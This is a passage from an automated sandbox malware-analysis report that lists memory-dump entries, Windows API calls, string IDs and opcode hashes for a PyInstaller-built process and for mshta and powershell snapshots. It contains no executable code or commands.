                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875685379.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875685379.00007FF7F9221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875766450.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Value$ErrorLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2506987500-0
                                                                                                                                                                                                                              • Opcode ID: 7a7efe5704aebd884d83a549bac9021180a30b6e3a5084d39c82c78793c2ea5e
                                                                                                                                                                                                                              • Instruction ID: 05fed30dbe833381ccbe02d857a0200d849fcf7b0633491a18c86575560cce8f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7a7efe5704aebd884d83a549bac9021180a30b6e3a5084d39c82c78793c2ea5e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 67214A20E4D20A81FB697B617E5517DD1625F447A8F844734EA3E46ADEFE2CB44183A0
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00007FF7F91F4F81,?,?,?,?,00007FF7F91FA4FA,?,?,?,?,00007FF7F91F71FF), ref: 00007FF7F91FB347
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF7F91F4F81,?,?,?,?,00007FF7F91FA4FA,?,?,?,?,00007FF7F91F71FF), ref: 00007FF7F91FB37D
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF7F91F4F81,?,?,?,?,00007FF7F91FA4FA,?,?,?,?,00007FF7F91F71FF), ref: 00007FF7F91FB3AA
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF7F91F4F81,?,?,?,?,00007FF7F91FA4FA,?,?,?,?,00007FF7F91F71FF), ref: 00007FF7F91FB3BB
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF7F91F4F81,?,?,?,?,00007FF7F91FA4FA,?,?,?,?,00007FF7F91F71FF), ref: 00007FF7F91FB3CC
                                                                                                                                                                                                                              • SetLastError.KERNEL32(?,?,?,00007FF7F91F4F81,?,?,?,?,00007FF7F91FA4FA,?,?,?,?,00007FF7F91F71FF), ref: 00007FF7F91FB3E7
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1875580229.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875495657.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875640004.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875685379.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875685379.00007FF7F9221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875766450.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Value$ErrorLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2506987500-0
                                                                                                                                                                                                                              • Opcode ID: 6c88e88182f069636ae7df0ba171e708af9cab9deaf2d86c464056bb8d47fe11
                                                                                                                                                                                                                              • Instruction ID: 91b4b69916f986d88ed171446b9ea7620022922d002332079523abcbcc9a57ba
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6c88e88182f069636ae7df0ba171e708af9cab9deaf2d86c464056bb8d47fe11
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CE117C21F8C24A82FB687B216E5013DD1625F447B8FC44335EA3E467DEFE2CA44183A0
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1875580229.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875495657.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875640004.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875685379.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875685379.00007FF7F9221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875766450.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                                                                              • String ID: Unhandled exception in script
                                                                                                                                                                                                                              • API String ID: 3081866767-2699770090
                                                                                                                                                                                                                              • Opcode ID: 9d37adb8919aaa9301242e1672c0db5e18d6b44b4274937772719b263de12092
                                                                                                                                                                                                                              • Instruction ID: cde9648390806a3dbab9a3a180ee4fc0d4614f09e5cc568622a36302ccc22a9d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9d37adb8919aaa9301242e1672c0db5e18d6b44b4274937772719b263de12092
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 01314F72A096828AEB64BF21FC552F9A360FF88788F840135EA5D87A99DF3CD1058751
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF7F91E918F,?,00007FF7F91E3C55), ref: 00007FF7F91E2BA0
                                                                                                                                                                                                                              • MessageBoxW.USER32 ref: 00007FF7F91E2C2A
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1875580229.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875495657.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875640004.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875685379.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875685379.00007FF7F9221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875766450.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentMessageProcess
                                                                                                                                                                                                                              • String ID: WARNING$Warning$[PYI-%d:%ls]
                                                                                                                                                                                                                              • API String ID: 1672936522-3797743490
                                                                                                                                                                                                                              • Opcode ID: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
                                                                                                                                                                                                                              • Instruction ID: 43b3f26000dfdfdebc77c898112c2a125ff82fc087ed68cdcf59092c872b7465
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D221A372B08B4182E761AF14FC447AAA364EB88784F800135EE9D976A9DF3CE645C790
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1875580229.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875495657.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875640004.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875685379.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875685379.00007FF7F9221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875766450.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                              • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                              • Opcode ID: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
                                                                                                                                                                                                                              • Instruction ID: 8acd96ae15b1f5222ef32223886f4f8e04bce91f8c5792a94d5de098dfeb807b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E1F04F61A0960681FF64AF24AC557799330AF85765F940235D67E865FCDF2CD08887A0
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1875580229.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875495657.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875640004.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875685379.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875685379.00007FF7F9221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875766450.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _set_statfp
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1156100317-0
                                                                                                                                                                                                                              • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                              • Instruction ID: f0e261684316692b658090b94d62b5b04e2c0a62debf1f49f119fefb1cfc9640
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C511BF6AE0CA1301F7D43924DC56375A0646F59370FC40634EBBF862FE8E2CA94941A1
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • FlsGetValue.KERNEL32(?,?,?,00007FF7F91FA613,?,?,00000000,00007FF7F91FA8AE,?,?,?,?,?,00007FF7F91FA83A), ref: 00007FF7F91FB41F
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF7F91FA613,?,?,00000000,00007FF7F91FA8AE,?,?,?,?,?,00007FF7F91FA83A), ref: 00007FF7F91FB43E
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF7F91FA613,?,?,00000000,00007FF7F91FA8AE,?,?,?,?,?,00007FF7F91FA83A), ref: 00007FF7F91FB466
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF7F91FA613,?,?,00000000,00007FF7F91FA8AE,?,?,?,?,?,00007FF7F91FA83A), ref: 00007FF7F91FB477
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF7F91FA613,?,?,00000000,00007FF7F91FA8AE,?,?,?,?,?,00007FF7F91FA83A), ref: 00007FF7F91FB488
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1875580229.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875495657.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875640004.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875685379.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875685379.00007FF7F9221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875766450.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Value
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3702945584-0
                                                                                                                                                                                                                              • Opcode ID: 43a5c13e669b9c0dc60c9d5204f3187f9cebb30c335aac4df6ce1d0b58ad24f5
                                                                                                                                                                                                                              • Instruction ID: 6d1cdb180982a9e06e76c52639da7bd5ebea41eadfa6d4c9bc6212ec23e341cf
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 43a5c13e669b9c0dc60c9d5204f3187f9cebb30c335aac4df6ce1d0b58ad24f5
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 40116320E4960A81FB69BF217E5117DD1665F447B8FC84334DA3E467DEFE2CA44182A0
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1875580229.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875495657.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875640004.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875685379.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875685379.00007FF7F9221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875766450.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Value
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3702945584-0
                                                                                                                                                                                                                              • Opcode ID: 8aa69c65082f5ed190463b1c2d732539134b8ecb86da000f77e4666776fecf75
                                                                                                                                                                                                                              • Instruction ID: f73985c7d38c1c6319b02e53264c16cba8546c88ac09617218f9da3c9ea843eb
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8aa69c65082f5ed190463b1c2d732539134b8ecb86da000f77e4666776fecf75
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8B110A10F8920E81FB697E227C5117D91625F45378FC84734DA3E4A3DAFD2CB84282A1
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1875580229.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875495657.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875640004.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875685379.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875685379.00007FF7F9221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875766450.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                              • API String ID: 3215553584-1196891531
                                                                                                                                                                                                                              • Opcode ID: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
                                                                                                                                                                                                                              • Instruction ID: 64ce84591e8c3094fbaacc393b3e614ff5c2b413e64bd879d8eadf6881faf23c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B681D732D0824A85F7646E26AA10278B6B0AB1574CFD64035CB3D877CEFBADA501C3E1
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1875580229.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875495657.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875640004.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875685379.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875685379.00007FF7F9221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875766450.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                              • String ID: csm$csm
                                                                                                                                                                                                                              • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                              • Opcode ID: 1b872e8f6993e9c5779cc40e3c84c693849f7921638dfce8d08fafba9ab8d571
                                                                                                                                                                                                                              • Instruction ID: b3f6f1b638aaccd5ce8becc5c48bb3e38bda516e9ef74176f2622eaf75cfd529
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1b872e8f6993e9c5779cc40e3c84c693849f7921638dfce8d08fafba9ab8d571
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CF519F32E08282C7EB65BF22A844269B6B0EB54B84F944135EE6D477D9DF3CF450C792
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1875580229.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875495657.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875640004.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875685379.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875685379.00007FF7F9221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875766450.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4170891091-0
                                                                                                                                                                                                                              • Opcode ID: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
                                                                                                                                                                                                                              • Instruction ID: edcbd4e15d9d6da7310bf1c3debd539de2ac0b37613043e10e6cf010f95aaac0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DE51F772F081168AFB14EF25AD556BCABB1AB4035CF900135DE3D93BE9EB78A441C750
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1875580229.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875495657.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875640004.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875685379.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875685379.00007FF7F9221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875766450.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: ?
                                                                                                                                                                                                                              • API String ID: 1286766494-1684325040
                                                                                                                                                                                                                              • Opcode ID: 8108d8be77440c3e9c62f2a415d3a3f63afd5a4d850aaf976d1496cecaf540be
                                                                                                                                                                                                                              • Instruction ID: 400a9f948239cff76c9ed9ceeca87c3b98fe818b1014b88f3b30f1bf36b8fbec
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8108d8be77440c3e9c62f2a415d3a3f63afd5a4d850aaf976d1496cecaf540be
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 33412B12A0868541FBA4AF16AC0177AD670EF80BA4F944235EF7C86AEDDF3DD441C750
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1875580229.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875495657.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875640004.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875685379.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875685379.00007FF7F9221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875766450.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                              • String ID: U
                                                                                                                                                                                                                              • API String ID: 442123175-4171548499
                                                                                                                                                                                                                              • Opcode ID: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
                                                                                                                                                                                                                              • Instruction ID: 908476807976353adf4b453babdfbc084a1d334f8dbb5a8bdd553b699048266d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9441B432B19A4581EB60AF25F8443ADA771FB88794F804031EE6D87B98EF3CD401CB90
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1875580229.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875495657.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875640004.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875685379.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875685379.00007FF7F9221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875766450.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentDirectory
                                                                                                                                                                                                                              • String ID: :
                                                                                                                                                                                                                              • API String ID: 1611563598-336475711
                                                                                                                                                                                                                              • Opcode ID: 779a21297323b81187f7e0c7d27b40be9ec8fbab2d126766b2de98969da868de
                                                                                                                                                                                                                              • Instruction ID: 5bb81c8b85d3395f77290db51f4e3511d13725c8bf99afbafa521d9bab351c51
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 779a21297323b81187f7e0c7d27b40be9ec8fbab2d126766b2de98969da868de
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2221B422E0868582FB20AF16E84426DA3B1FB84B48FD54035D7BD437D8EFBCE545C6A1
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000003.1476109088.000001967A650000.00000010.00000800.00020000.00000000.sdmp, Offset: 000001967A650000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_3_1967a650000_mshta.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                                                                                                              • Instruction ID: 6838205dc93ddb496558872b2fd0bb0b4bb12653ed14cd2db225efba7cc32931
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4890021549540659D51861D10D5529C60406388654FD54480881690145E44D42D61162
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000C.00000002.1551067542.00007FF885090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF885090000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_7ff885090000_powershell.jbxd
